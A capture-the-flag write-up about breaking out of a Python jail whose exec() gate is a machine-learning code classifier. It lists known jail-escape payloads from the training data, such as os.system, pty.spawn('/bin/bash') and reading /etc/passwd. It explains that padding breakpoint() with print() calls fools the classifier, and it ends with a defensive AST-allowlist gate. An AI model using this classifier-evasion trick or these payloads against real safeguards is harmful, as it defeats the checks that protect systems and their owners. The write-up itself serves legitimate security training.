An AI-powered fortress guards a treasure trove of forbidden knowledge. Legends speak of a mystical combination of Machine Learning and Python code, interwoven with an impenetrable pyjail defense mechanism. Your mission, should you accept it, is to breach this formidable barrier and unearth the secrets hidden within. Good luck
Initial Impressions
Connecting to the challenge server, we are presented with "Bad Code Detected...." whenever we enter any Python command other than print.
Looking at the source code, we see that our input is being sent to the ML model via the classification function. If the code is deemed as good_code, we get RCE via the exec function.
If we look at the data that the model is being trained on, we see that good_code.txt mainly consists of print statements while bad_code.txt consists of your usual python3 jail escapes.
# Contents of good_code.txt
print('Hello, World!')
x = 5; y = 10; print(x + y)
numbers = [1, 2, 3, 4, 5]; print(sum(numbers))
print(''.join(['Hello', ' ', 'World!']))
print('The answer is', 42)
print('Even' if x % 2 == 0 else 'Odd')
names = ['Alice', 'Bob', 'Charlie']; print(', '.join(names))
import math; print(math.sqrt(16))
x, y = 2, 3; print(x * y)
print(' '.join([str(i) for i in range(10)]))
print(sorted([3, 2, 1]))
print(len('Hello'))
print('Python'.upper())
print(max([4, 1, 7, 3]))
print('Hello, World!'[::-1])
print(chr(65))
print(ord('A'))
print(2 ** 10)
print('Hello, World!'.split(','))
print([i ** 2 for i in range(5)])
x = 5; y = 2; print(x ** y)
print(any([True, False, False]))
print(all([True, True, True]))
print(bin(42))
print(hex(255))
<snip>
# Contents of bad_code.txt
os.system("ls")
os.popen("ls").read()
commands.getstatusoutput("ls")
commands.getoutput("ls")
commands.getstatus("file/path")
subprocess.call("ls", shell=True)
subprocess.Popen("ls", shell=True)
pty.spawn("ls")
pty.spawn("/bin/bash")
platform.os.system("ls")
pdb.os.system("ls")
importlib.import_module("os").system("ls")
importlib.__import__("os").system("ls")
imp.load_source("os", "/usr/lib/python3.8/os.py").system("ls")
imp.os.system("ls")
imp.sys.modules["os"].system("ls")
sys.modules["os"].system("ls")
__import__("os").system("ls")
import os
from os import *
open("/etc/passwd").read()
open('/var/www/html/input', 'w').write('123')
execfile('/usr/lib/python2.7/os.py')
system('ls')
exec()
exec("print('RCE'); __import__('os').system('ls')")
exec("print('RCE')\n__import__('os').system('ls')")
<snip>
So the exploit most likely has something to do with print.
Solve
My teammates suggested using the breakpoint function, which will allow us to enter PDB (Python Debugger) and execute Python commands.
However, if we try to execute the function as is, it gets classified as bad code.
You can also trick the machine learning model into interpreting the code as good code by entering multiple print() before appending breakpoint() to the end.
I suspect the reason why breakpoint() is being blacklisted in the first place is because of the use of () which is prevalent in the training data for bad code.
If I try using multiple prints with a known "bad code payload" such as import os or exec(), it doesn't seem to work.
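The padding trick works because the gate is a statistical score over the whole input. As a contrast, here is an added example (not the challenge's code) of a deterministic gate that parses the input and allowlists AST nodes and call targets, so extra print() calls cannot change the verdict on breakpoint(). The names check_snippet, run_checked and the allowlist contents are assumptions made for this sketch.

```python
import ast
import builtins

# Assumption: this allowlist is illustrative and deliberately stricter than
# good_code.txt (method calls such as 'Python'.upper() and imports are refused).
ALLOWED_CALLS = {"print", "len", "sum", "sorted", "max", "min", "str",
                 "range", "chr", "ord", "bin", "hex", "any", "all"}
ALLOWED_NODES = (
    ast.Module, ast.Expr, ast.Assign, ast.Call, ast.Name, ast.Load, ast.Store,
    ast.Constant, ast.List, ast.Tuple, ast.ListComp, ast.comprehension,
    ast.BinOp, ast.UnaryOp, ast.Compare, ast.BoolOp, ast.IfExp,
    ast.operator, ast.unaryop, ast.cmpop, ast.boolop,
)


def check_snippet(source):
    """Return (True, "") if every AST node is allowlisted, else (False, reason)."""
    try:
        nodes = list(ast.walk(ast.parse(source, mode="exec")))
    except (SyntaxError, ValueError) as exc:
        return False, f"unparseable input: {exc}"
    # Variables the snippet defines itself; they must not shadow allowed calls.
    assigned = {n.id for n in nodes
                if isinstance(n, ast.Name) and isinstance(n.ctx, ast.Store)}
    if assigned & ALLOWED_CALLS:
        return False, "rebinding an allowlisted function"
    for node in nodes:
        if not isinstance(node, ALLOWED_NODES):
            return False, f"node type {type(node).__name__} not allowed"
        if isinstance(node, ast.Call) and not (
                isinstance(node.func, ast.Name) and node.func.id in ALLOWED_CALLS):
            return False, f"call to {getattr(node.func, 'id', '<expression>')!r} not allowlisted"
        if (isinstance(node, ast.Name) and isinstance(node.ctx, ast.Load)
                and node.id not in ALLOWED_CALLS | assigned):
            return False, f"name {node.id!r} not allowed"
    return True, ""


def run_checked(source):
    """Execute source only if it passes check_snippet; return its variables."""
    ok, reason = check_snippet(source)
    if not ok:
        raise ValueError(reason)
    # Second layer: expose only the allowlisted builtins to the executed code.
    scope = {"__builtins__": {n: getattr(builtins, n) for n in ALLOWED_CALLS}}
    exec(compile(source, "<input>", "exec"), scope)
    return {k: v for k, v in scope.items() if k != "__builtins__"}
```

The check does not bound resource use (for example very large exponents), so a real service would still need process isolation and limits around the exec call.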